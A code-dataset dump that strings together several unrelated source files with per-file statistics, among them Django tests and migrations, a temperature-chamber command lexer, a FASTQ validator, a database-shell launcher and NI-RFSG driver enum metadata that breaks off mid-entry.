PracticalInfo.objects.create(content=practical_info_content)
self.client.login(username='bobby', password='tables')
response = self.client.get('/info')
self.assertEqual(200, response.status_code)
self.assertIn(practical_info_content, response.content)
| 36.527778 | 88 | 0.709506 | 164 | 1,315 | 5.530488 | 0.414634 | 0.055127 | 0.059537 | 0.06946 | 0.208379 | 0.180816 | 0.180816 | 0.180816 | 0.180816 | 0.180816 | 0 | 0.005535 | 0.175665 | 1,315 | 35 | 89 | 37.571429 | 0.831181 | 0 | 0 | 0.185185 | 0 | 0 | 0.114829 | 0.01597 | 0 | 0 | 0 | 0 | 0.185185 | 1 | 0.148148 | false | 0.074074 | 0.222222 | 0 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1571341d83cd432e4e2b3f570d8cc5296c59376d | 5,401 | py | Python | library/templexer.py | K4zuki/tempcommand | ee5c7474975f08e38492f1a98271c2dde9350333 | [
"Apache-2.0"
] | null | null | null | library/templexer.py | K4zuki/tempcommand | ee5c7474975f08e38492f1a98271c2dde9350333 | [
"Apache-2.0"
] | null | null | null | library/templexer.py | K4zuki/tempcommand | ee5c7474975f08e38492f1a98271c2dde9350333 | [
"Apache-2.0"
] | null | null | null | #-*- coding: utf-8 -*-
#!/usr/bin/env python
# Copyright (c) 2016 Kazuki Yamamoto
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import shlex
import pprint
def serialize_loop(arg):
__tok, idx, cmd, arg = arg
arg = arg.strip("{}();")
arg = arg.split(":")
# print arg
_cmd = arg[0]
_arg = arg[1:]
__arg = [[], ]
while(_arg):
__arg.append(_arg.pop().split(','))
__arg.reverse()
__arg.pop()
# print "__arg = ",__arg
# print "len(__arg) = ",len(__arg)
_stack = []
inloop = []
for i, command in enumerate(__tok, start=idx):
cmd = command[0]
arg = command[1]
inloop.append([cmd, arg])
# print "%03d"%i,cmd+arg
# inloop = "".join(inloop)
cmdtype = len(__arg)
if(cmdtype == 3):
for _, val in enumerate(__arg[2]):
for _, _val in enumerate(__arg[1]):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, ":".join([__val, _val, val])])
_stack.extend(inloop)
# print "%s(%s:%s:%s);%s" %(
# _cmd,
# ",".join(str(__val)),
# _val,
# val,inloop
# ),
# print
elif(cmdtype == 2):
for _, _val in enumerate(__arg[1]):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, ":".join([__val, _val])])
# print pprint.pprint(_stack)
_stack.extend(inloop)
# print "%s(%s:%s);%s" %(
# _cmd,
# __val,
# _val,inloop
# ),
# print
elif(cmdtype == 1):
for _, __val in enumerate(__arg[0]):
_stack.append([_cmd, __val])
_stack.extend(inloop)
# print "%s(%s);%s" %(
# _cmd,
# __val,inloop
# )
# print "_stack = ",
# print pprint.pprint(_stack)
return _stack
# callback[ cmd ]( (None, 0, _cmd, _arg ))
def parse(script="eof"):
_tok = []
__tok = []
_for = []
ret = []
tokens = shlex.shlex(script.upper())
while(True):
tok = tokens.get_token()
if (not tok) or (tok == "EOF"):
break
else:
# print tok
_tok.append(tok)
if(tok == "{" or tok == ";"):
__tok.append([_tok[0], "".join(_tok[1:])])
_tok = []
if(tok == "}"):
# _f = []
_for = []
# _for.append([_tok[0],"".join(_tok[1:])])
while not (__tok[-1][0] == "FOR"):
# print __tok[-1]
_for.append(__tok.pop())
_f = __tok.pop()
# print pprint.pprint(_for)
# print _f
_for.reverse()
__tok.extend(serialize_loop((_for, 0, _f[0], _f[1])))
# print pprint.pprint(__tok)
_tok = []
# print pprint.pprint(__tok)
try:
for i, command in enumerate(__tok):
cmd = command[0]
arg = command[1]
# print cmd,arg
ret.append(str(callback[cmd](arg)))
finally:
return ret
callback = {}
# add_command
# adds command and casllback functions as dictionary pair
# @param command command; must be large character
# @param func callback function; should be started with '_'
def add_command(command, func):
callback[command] = func
def nop(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
print arg
add_command("NOP", nop)
def reg(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
print arg
add_command("REG", reg)
def suspend(arg):
arg = arg.strip("{}();")
arg = arg.split(":")
print(" SUSPEND: press return to continue ".center(80, "#"))
raw_input()
add_command("SUSPEND", suspend)
# add_command("NOP",nop)
# add_command("REG",reg)
add_command("UREG", reg)
add_command("CHAN", reg)
add_command("BASE", reg)
add_command("UBASE", reg)
add_command("TEMP", reg)
add_command("DELY", reg)
add_command("SAMPLE", reg)
# add_command("SUSPEND",suspend)
| 31.04023 | 86 | 0.522681 | 623 | 5,401 | 4.295345 | 0.298555 | 0.035874 | 0.038864 | 0.038117 | 0.232063 | 0.219731 | 0.150224 | 0.150224 | 0.107997 | 0.095665 | 0 | 0.009843 | 0.341603 | 5,401 | 173 | 87 | 31.219653 | 0.742688 | 0.366784 | 0 | 0.293478 | 0 | 0 | 0.037351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.021739 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
15727598d3535ab4c01841285576554553a6132c | 3,161 | py | Python | kimsta/migrations/0002_auto_20211208_1726.py | Evan-cell/instagram | 630031b7a5887392466a0ba84da95e5bac106f39 | [
"Unlicense"
] | null | null | null | kimsta/migrations/0002_auto_20211208_1726.py | Evan-cell/instagram | 630031b7a5887392466a0ba84da95e5bac106f39 | [
"Unlicense"
] | null | null | null | kimsta/migrations/0002_auto_20211208_1726.py | Evan-cell/instagram | 630031b7a5887392466a0ba84da95e5bac106f39 | [
"Unlicense"
] | null | null | null | # Generated by Django 3.2.7 on 2021-12-08 14:26
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('kimsta', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='posts',
name='caption',
),
migrations.RemoveField(
model_name='posts',
name='posted',
),
migrations.AddField(
model_name='posts',
name='like_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='posts',
name='liked',
field=models.ManyToManyField(blank=True, default=None, related_name='liked', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='posts',
name='post_date',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='posts',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='images', to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile_photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('bio', models.TextField(blank=True, max_length=500, null=True)),
('contact', models.CharField(blank=True, max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Likes',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.CharField(choices=[('Like', 'Like'), ('Dislike', 'Dislike')], default='like', max_length=10)),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='kimsta.posts')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', models.CharField(max_length=250)),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='kimsta.posts')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL)),
],
),
]
| 42.716216 | 145 | 0.601708 | 327 | 3,161 | 5.66055 | 0.29052 | 0.034576 | 0.052944 | 0.083198 | 0.56618 | 0.554835 | 0.422474 | 0.422474 | 0.345759 | 0.293895 | 0 | 0.014133 | 0.26131 | 3,161 | 73 | 146 | 43.30137 | 0.778587 | 0.014236 | 0 | 0.492537 | 1 | 0 | 0.085421 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.059701 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1573df68f0c7fd25a083bffddc3a0093c5f81f19 | 2,388 | py | Python | python/taskmda/mda/svc/generate_entity_ngrams.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | python/taskmda/mda/svc/generate_entity_ngrams.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | python/taskmda/mda/svc/generate_entity_ngrams.py | jiportilla/ontology | 8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import pprint
from base import BaseObject
from base import FileIO
from base import MandatoryParamError
class GenerateEntityNgrams(BaseObject):
def __init__(self,
ontology_name: str,
some_labels: list,
some_patterns: dict,
is_debug: bool = False):
"""
Updated:
1-Aug-2017
craig.trim@ibm.com
* added output-file param so this can be controlled by orchestrating service
<https://github.ibm.com/abacus-implementation/Abacus/issues/1721#issuecomment-3069168>
Updated:
21-Feb-2019
craig.trim@ibm.com
* migrated to text
Updated:
28-Mar-2019
craig.trim@ibm.com
* updated to add labels and patterns
Updated:
13-Dec-2019
craig.trim@ibm.com
* add ontology-name as a param
https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1583
"""
BaseObject.__init__(self, __name__)
if not some_labels:
raise MandatoryParamError("Labels")
if not some_patterns:
raise MandatoryParamError("Patterns")
self._is_debug = is_debug
self._labels = some_labels
self._patterns = some_patterns
self._ontology_name = ontology_name
def process(self):
from taskmda.mda.dmo import GenericTemplateAccess
from taskmda.mda.dmo import EntityNgramDictGenerator
from taskmda.mda.dto import KbNames
from taskmda.mda.dto import KbPaths
dictionary = EntityNgramDictGenerator().process(self._labels,
list(self._patterns.values()))
the_json_result = pprint.pformat(dictionary, indent=4)
the_json_result = "{0} = {{\n {1}".format(
KbNames.entity_ngrams(), the_json_result[1:])
the_template_result = GenericTemplateAccess.process()
the_template_result = the_template_result.replace(
"CONTENT", the_json_result)
path = os.path.join(os.environ["CODE_BASE"],
KbPaths.ngrams(ontology_name=self._ontology_name))
FileIO.text_to_file(path, the_template_result)
return dictionary
| 33.166667 | 102 | 0.600084 | 257 | 2,388 | 5.36965 | 0.435798 | 0.052174 | 0.034783 | 0.043478 | 0.107971 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026413 | 0.318258 | 2,388 | 71 | 103 | 33.633803 | 0.821253 | 0.247069 | 0 | 0 | 1 | 0 | 0.026878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.243243 | 0 | 0.351351 | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
157b40f5bd5e10ed04c063e23c30e7f531f7e95b | 1,870 | py | Python | modules/core/dbshell/dbshell.py | petabyteboy/nixcloud-webservices | a08cab699af8eecee5e9142c0acd50bc44c65c0b | [
"MIT"
] | 121 | 2017-11-18T13:41:58.000Z | 2022-03-29T19:11:18.000Z | modules/core/dbshell/dbshell.py | petabyteboy/nixcloud-webservices | a08cab699af8eecee5e9142c0acd50bc44c65c0b | [
"MIT"
] | 62 | 2017-11-18T23:07:04.000Z | 2021-07-14T15:47:16.000Z | modules/core/dbshell/dbshell.py | petabyteboy/nixcloud-webservices | a08cab699af8eecee5e9142c0acd50bc44c65c0b | [
"MIT"
] | 24 | 2017-11-18T21:12:18.000Z | 2021-06-03T13:50:02.000Z | #!@interpreter@
import os
from pwd import getpwnam
from argparse import ArgumentParser
DBSHELL_CONFIG = @dbshellConfig@ # noqa
WEBSERVICES_PREFIX = "/var/lib/nixcloud/webservices"
def run_shell(dbname, user, command):
os.setuid(getpwnam(user).pw_uid)
os.execl(command, command, user, dbname)
def determine_wsname():
rel_to_ws_dir = os.path.relpath(os.getcwd(), WEBSERVICES_PREFIX)
components = rel_to_ws_dir.split(os.sep, 1)
if len(components) != 2:
return None
wsname_canidate = components[0]
if wsname_canidate in [os.curdir, os.pardir]:
return None
if wsname_canidate not in DBSHELL_CONFIG:
return None
return wsname_canidate
if __name__ == '__main__':
desc = "Connect to a database within a web service instance"
parser = ArgumentParser(description=desc)
parser.add_argument("webservice_name", nargs='?',
help="The web service name. If the argument is"
" omitted, the service name is determined"
" by inspecting the current directory.")
parser.add_argument("database", help="The database name to connect to.")
options = parser.parse_args()
if options.webservice_name is None:
wsname = determine_wsname()
if wsname is None:
parser.error("Unable to determine web service name.")
elif options.webservice_name not in DBSHELL_CONFIG:
msg = "Web service {!r} does not exist."
parser.error(msg.format(options.webservice_name))
else:
wsname = options.webservice_name
wsdef = DBSHELL_CONFIG[wsname]
if options.database not in wsdef:
msg = "Database {!r} does not exist for web service {!r}."
parser.error(msg.format(options.database, wsname))
else:
run_shell(options.database, **wsdef[options.database])
| 34.62963 | 76 | 0.668449 | 235 | 1,870 | 5.161702 | 0.382979 | 0.04122 | 0.06925 | 0.016488 | 0.044518 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002104 | 0.237433 | 1,870 | 53 | 77 | 35.283019 | 0.848527 | 0.01016 | 0 | 0.116279 | 0 | 0 | 0.205517 | 0.015684 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.069767 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
15806f602493b87131d570db5bf0de3988dac8d8 | 3,115 | py | Python | validator/fastq.py | rdgoite/fastq-validation | 7a9d074b4c109451d7d71567dbaf4245d2cad716 | [
"Apache-2.0"
] | null | null | null | validator/fastq.py | rdgoite/fastq-validation | 7a9d074b4c109451d7d71567dbaf4245d2cad716 | [
"Apache-2.0"
] | 1 | 2021-06-01T21:45:45.000Z | 2021-06-01T21:45:45.000Z | validator/fastq.py | rdgoite/fastq-validation | 7a9d074b4c109451d7d71567dbaf4245d2cad716 | [
"Apache-2.0"
] | null | null | null | class Validator:
PLUS_CHAR = 43
AT_CHAR = 64
def __init__(self):
self.validation_results = None
self.sequence_symbols = list()
for symbol in "ACTGN.":
self.sequence_symbols.append(ord(symbol))
self.quality_score_symbols = list()
for symbol in "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\
[\]^_`abcdefghijklmnopqrstuvwxyz{|}~":
self.quality_score_symbols.append(ord(symbol))
def validate(self, file_path):
valid = True
with open(file_path, 'rb') as source:
record = list()
for line in source:
if not valid:
break
line = line.rstrip()
line_is_not_empty = line # added for readability
if line_is_not_empty:
record.append(line)
record_is_ready = len(record) == 4
if record_is_ready:
valid = valid and self._validate_record(record)
record.clear()
else:
valid = False
valid = valid and len(record) == 0
return valid
def _validate_record(self, record):
valid_identifier = self._validate_identifier_line(record[0])
valid_bases = self._validate_bases(record[1])
valid_plus = self._validate_plus(record[2])
valid_quality_scores = self._validate_quality_scores(record[3])
equal_lengths = self._validate_bases_length_equals_qc_length(record[1], record[3])
return valid_identifier and valid_bases and valid_plus and valid_quality_scores \
and equal_lengths
def _validate_identifier_line(self, line):
# is the first char @ ?
has_at_char = line[0] == Validator.AT_CHAR
# all ascii chars?
all_ascii = Validator._all_ascii(line)
return has_at_char and all_ascii
#TODO implement case insensitive check
def _validate_bases(self, line):
valid = False
has_n_char = False
has_period = False
for symbol in line:
valid = symbol in self.sequence_symbols
if valid:
if symbol == ord("N"):
has_n_char = True
if symbol == ord("."):
has_period = True
return valid and not has_n_char or not has_period
def _validate_plus(self, line):
# is the first char a plus sign?
has_plus_char = line[0] == Validator.PLUS_CHAR
return has_plus_char
def _validate_quality_scores(self, line):
for symbol in line:
if symbol not in self.quality_score_symbols:
return False;
return True
def _validate_bases_length_equals_qc_length(self, base_line, qc_line):
base_length = len(base_line)
quality_length = len(qc_line)
return base_length == quality_length
@staticmethod
def _all_ascii(line):
for char in line:
if char > 128:
return False
return True
| 35.804598 | 90 | 0.582665 | 364 | 3,115 | 4.684066 | 0.233516 | 0.045161 | 0.025806 | 0.040469 | 0.090323 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0.013139 | 0.340289 | 3,115 | 86 | 91 | 36.22093 | 0.816545 | 0.041091 | 0 | 0.082192 | 0 | 0 | 0.004025 | 0 | 0 | 0 | 0 | 0.011628 | 0 | 1 | 0.123288 | false | 0 | 0 | 0 | 0.30137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
15898a995b5971187abab36d048bb1449cd025a4 | 64,499 | py | Python | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 24 | 2021-03-25T18:37:59.000Z | 2022-03-03T16:33:56.000Z | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 129 | 2021-04-03T15:16:04.000Z | 2022-03-25T21:48:18.000Z | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 24 | 2021-03-31T12:36:14.000Z | 2022-02-25T03:01:25.000Z | enums = {
'AmpPath': {
'values': [
{
'documentation': {
'description': ' Sets the amplification path to use the high power path. \n'
},
'name': 'HIGH_POWER',
'value': 16000
},
{
'documentation': {
'description': ' Sets the amplification path to use the low harmonic path. \n'
},
'name': 'LOW_HARMONIC',
'value': 16001
}
]
},
'AnalogModulationFMBand': {
'values': [
{
'documentation': {
'description': ' Specifies narrowband frequency modulation.\n'
},
'name': 'NARROWBAND',
'value': 17000
},
{
'documentation': {
'description': ' Specifies wideband frequency modulation.\n'
},
'name': 'WIDEBAND',
'value': 17001
}
]
},
'AnalogModulationFMNarrowbandIntegrator': {
'values': [
{
'documentation': {
'description': ' Specifies a range from 100 Hz to 1 kHz.\n'
},
'name': '100_HZ_TO_1_KHZ',
'value': 18000
},
{
'documentation': {
'description': ' Specifies a range from 1 kHz to 10 kHz.\n'
},
'name': '1_KHZ_TO_10_KHZ',
'value': 18001
},
{
'documentation': {
'description': ' Specifies a range from 10 kHz to 100 kHz.\n'
},
'name': '10_KHZ_TO_100_KHZ',
'value': 18002
}
]
},
'AnalogModulationPMMode': {
'values': [
{
'documentation': {
'description': ' Specifies high deviation. High deviation comes at the expense of a higher phase noise.\n'
},
'name': 'HIGH_DEVIATION',
'value': 19000
},
{
'documentation': {
'description': ' Specifies low phase noise. Low phase noise comes at the expense of a lower maximum deviation.\n'
},
'name': 'LOW_PHASE_NOISE',
'value': 19001
}
]
},
'AnalogModulationType': {
'values': [
{
'documentation': {
'description': ' Disables analog modulation.\n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is FM.\n'
},
'name': 'FM',
'value': 2000
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is PM.\n'
},
'name': 'PM',
'value': 2001
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is AM.\n'
},
'name': 'AM',
'value': 2002
}
]
},
'AnalogModulationWaveformType': {
'values': [
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is sine.\n'
},
'name': 'SINE',
'value': 3000
},
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is square.\n'
},
'name': 'SQUARE',
'value': 3001
},
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is triangle.\n'
},
'name': 'TRIANGLE',
'value': 3002
}
]
},
'AnySignalOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector. For the PXIe-5841 with PXIe-5655, the signal is exported to the PXIe-5841 PFI 0.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PFI 4 on the front panel DDC connector.\n'
},
'name': 'PFI4',
'value': 'PFI4'
},
{
'documentation': {
'description': ' PFI 5 on the front panel DDC connector.\n'
},
'name': 'PFI5',
'value': 'PFI5'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ArbFilterType': {
'values': [
{
'documentation': {
'description': ' None'
},
'name': 'NONE',
'value': 10000
},
{
'documentation': {
'description': ' Applies a root-raised cosine filter to the data with the alpha value specified with the NIRFSG_ATTR_ARB_FILTER_ROOT_RAISED_COSINE_ALPHA attribute. '
},
'name': 'ROOT_RAISED_COSINE',
'value': 10001
},
{
'documentation': {
'description': ' Applies a raised cosine filter to the data with the alpha value specified with the NIRFSG_ATTR_ARB_FILTER_RAISED_COSINE_ALPHA attribute. '
},
'name': 'RAISED_COSINE',
'value': 10002
}
]
},
'ArbOnboardSampleClockMode': {
'values': [
{
'documentation': {
'description': ' Specifies that the clock mode is high resoultion. High resolution sampling is when a sample rate is generated by a high resolution clock source.\n'
},
'name': 'HIGH_RESOLUTION',
'value': 6000
},
{
'documentation': {
'description': ' Specifies that the clock mode is divide down. Divide down sampling is when sample rates are generated by dividing the source frequency.\n'
},
'name': 'DIVIDE_DOWN',
'value': 6001
}
]
},
'ArbSampleClockSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Use the AWG module onboard clock as the clock source.\n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the external clock as the clock source.\n'
},
'name': 'CLK_IN',
'value': 'ClkIn'
}
]
},
'ConfigListTrigOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector. For the PXIe-5841 with PXIe-5655, the signal is exported to the PXIe-5841 PFI 0.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ConfigListTrigSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXI trigger line 7.\n'
},
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'documentation': {
'description': ' PXI Star trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARB',
'value': 'PXIe_DStarB'
},
{
'documentation': {
'description': ' Marker Event 0.\n'
},
'name': 'MARKER0_EVENT',
'value': 'Marker0Event'
},
{
'documentation': {
'description': ' Marker Event 1.\n'
},
'name': 'MARKER1_EVENT',
'value': 'Marker1Event'
},
{
'documentation': {
'description': ' Marker Event 2.\n'
},
'name': 'MARKER2_EVENT',
'value': 'Marker2Event'
},
{
'documentation': {
'description': ' Marker Event 3.\n'
},
'name': 'MARKER3_EVENT',
'value': 'Marker3Event'
},
{
'documentation': {
'description': ' Timer Event.\n'
},
'name': 'TIMER_EVENT',
'value': 'TimerEvent'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'ConfigListTriggerDigEdgeEdge': {
'values': [
{
'documentation': {
'description': ' Specifies the rising edge as the active edge. The rising edge occurs when the signal transitions from low level to high level.\n'
},
'name': 'RISING_EDGE',
'value': 0
}
]
},
'ConfigSettledEventOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
